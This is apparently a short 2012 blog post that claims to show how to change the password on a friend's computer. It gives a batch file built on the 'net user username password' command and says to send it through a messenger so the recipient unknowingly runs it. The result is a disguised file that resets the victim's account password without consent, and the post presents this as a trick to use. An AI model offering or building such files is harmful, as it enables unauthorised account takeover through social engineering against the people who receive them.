Monday, November 26, 2012

Changing password of a remote PC




Using the below given tips you can change the password of an user account in your friend’s system.

1. Open notepad.


2. Type the following command.

@echo off

net user username password

echo “type message here” pause

3. Save as filename.bat and select type of files as all files otherwise, file didn’t work.

4. Send file to your friend through any messenger.

You have successfully managed to change the Password of an user account.

No comments:

Post a Comment